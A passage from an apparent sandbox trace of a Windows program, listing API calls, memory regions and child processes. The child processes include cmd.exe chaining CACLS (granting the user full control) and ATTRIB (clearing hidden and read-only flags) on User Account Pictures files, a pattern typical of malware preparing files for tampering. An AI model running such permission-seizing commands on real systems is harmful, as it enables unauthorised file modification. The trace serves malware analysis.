lpExitCode=0x30ee9c | out: lpExitCode=0x30ee9c*=0x0) returned 1 [0183.600] CloseHandle (hObject=0x50) returned 1 [0183.600] _vsnwprintf (in: _Buffer=0x30efe4, _BufferCount=0x13, _Format="%08X", _ArgList=0x30eea8 | out: _Buffer="00000000") returned 8 [0183.600] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.600] GetEnvironmentStringsW () returned 0xa2410* [0183.600] FreeEnvironmentStringsW (penv=0xa2410) returned 1 [0183.600] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.600] GetEnvironmentStringsW () returned 0xa2410* [0183.600] FreeEnvironmentStringsW (penv=0xa2410) returned 1 [0183.600] DeleteProcThreadAttributeList (in: lpAttributeList=0x30ef00 | out: lpAttributeList=0x30ef00) [0183.600] GetConsoleTitleW (in: lpConsoleTitle=0x30f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.601] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.601] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.601] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.601] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.601] GetLastError () returned 0x2 [0183.601] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.601] GetLastError () returned 0x2 [0183.601] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0x9e4d8 [0183.602] FindClose (in: hFindFile=0x9e4d8 | out: hFindFile=0x9e4d8) returned 1 [0183.602] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.602] GetLastError () returned 0x2 [0183.602] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0x9e4d8 [0183.602] FindClose (in: hFindFile=0x9e4d8 | out: hFindFile=0x9e4d8) returned 1 [0183.602] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.602] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.602] GetConsoleTitleW (in: lpConsoleTitle=0x30f078, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.602] InitializeProcThreadAttributeList (in: lpAttributeList=0x30ef00, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30efc8 | out: lpAttributeList=0x30ef00, lpSize=0x30efc8) returned 1 [0183.602] UpdateProcThreadAttribute (in: lpAttributeList=0x30ef00, dwFlags=0x0, Attribute=0x60001, lpValue=0x30efc0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30ef00, lpPreviousValue=0x0) returned 1 [0183.602] GetStartupInfoW (in: lpStartupInfo=0x30eebc | out: lpStartupInfo=0x30eebc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0183.602] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.603] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30ef5c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30efa8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"", lpProcessInformation=0x30efa8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xfec, dwThreadId=0xf58)) returned 1 [0183.604] CloseHandle (hObject=0x50) returned 1 [0183.604] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.604] GetEnvironmentStringsW () returned 0xa2410* [0183.604] FreeEnvironmentStringsW (penv=0xa2410) returned 1 [0183.604] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0183.642] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30ee9c | out: lpExitCode=0x30ee9c*=0x0) returned 1 [0183.642] CloseHandle (hObject=0x4c) returned 1 [0183.642] _vsnwprintf (in: _Buffer=0x30efe4, _BufferCount=0x13, _Format="%08X", _ArgList=0x30eea8 | out: _Buffer="00000000") returned 8 [0183.642] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.642] GetEnvironmentStringsW () returned 0xa2410* [0183.642] FreeEnvironmentStringsW (penv=0xa2410) returned 1 [0183.642] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.642] GetEnvironmentStringsW () returned 0xa2410* [0183.642] FreeEnvironmentStringsW (penv=0xa2410) returned 1 [0183.642] DeleteProcThreadAttributeList (in: lpAttributeList=0x30ef00 | out: lpAttributeList=0x30ef00) [0183.642] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.642] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.642] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.642] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.643] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.643] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.643] SetConsoleInputExeNameW () returned 0x1 [0183.643] GetConsoleOutputCP () returned 0x1b5 [0183.643] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.643] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.643] exit (_Code=0) Process: id = "356" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xfe4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "355" os_parent_pid = "0xe58" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25961 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25962 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25963 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25964 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25965 start_va = 0x600000 end_va = 0x608fff entry_point = 0x600000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25966 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25967 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25968 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25969 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 25970 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25971 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25972 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25973 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25974 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 25975 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 25976 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25977 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25978 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25979 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25980 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25981 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25982 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 511 os_tid = 0xfe0 Thread: id = 512 os_tid = 0xe48 Process: id = "357" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xfec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "355" os_parent_pid = "0xe58" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25983 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25984 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25985 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25986 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 25987 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0xa0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25988 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25989 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25990 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25991 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 25992 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25993 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25994 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25995 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25996 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 25997 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 25998 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25999 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26000 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26001 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26002 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26003 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26004 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26005 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26006 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26007 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26008 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26009 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26010 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 26011 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26012 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 513 os_tid = 0xf58 Process: id = "358" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xe50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26013 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26014 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26015 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26016 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 26017 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26018 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26019 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26020 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26021 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 26022 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26023 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26024 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26025 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26026 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26027 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 26028 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26029 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26030 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26031 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26032 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26033 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26034 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26035 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26036 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26037 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26038 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26039 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26040 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 26041 start_va = 0x2b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 26042 start_va = 0x3c0000 end_va = 0x3c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 26043 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 26044 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 26045 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 26046 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 26047 start_va = 0x1290000 end_va = 0x155efff entry_point = 0x1290000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 514 os_tid = 0xddc [0183.690] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af7ec | out: lpSystemTimeAsFileTime=0x2af7ec*(dwLowDateTime=0xa2644d00, dwHighDateTime=0x1d440a9)) [0183.690] GetCurrentProcessId () returned 0xe50 [0183.691] GetCurrentThreadId () returned 0xddc [0183.691] GetTickCount () returned 0x3497d [0183.691] QueryPerformanceCounter (in: lpPerformanceCount=0x2af7e4 | out: lpPerformanceCount=0x2af7e4*=24047978880) returned 1 [0183.691] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0183.691] __set_app_type (_Type=0x1) [0183.691] __p__fmode () returned 0x76b331f4 [0183.691] __p__commode () returned 0x76b331fc [0183.691] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0183.691] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0183.692] GetCurrentThreadId () returned 0xddc [0183.692] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xddc) returned 0x38 [0183.692] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.692] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0183.692] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.692] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0183.692] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af77c | out: phkResult=0x2af77c*=0x0) returned 0x2 [0183.692] VirtualQuery (in: lpAddress=0x2af7b3, lpBuffer=0x2af74c, dwLength=0x1c | out: lpBuffer=0x2af74c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.692] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af74c, dwLength=0x1c | out: lpBuffer=0x2af74c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0183.692] VirtualQuery (in: 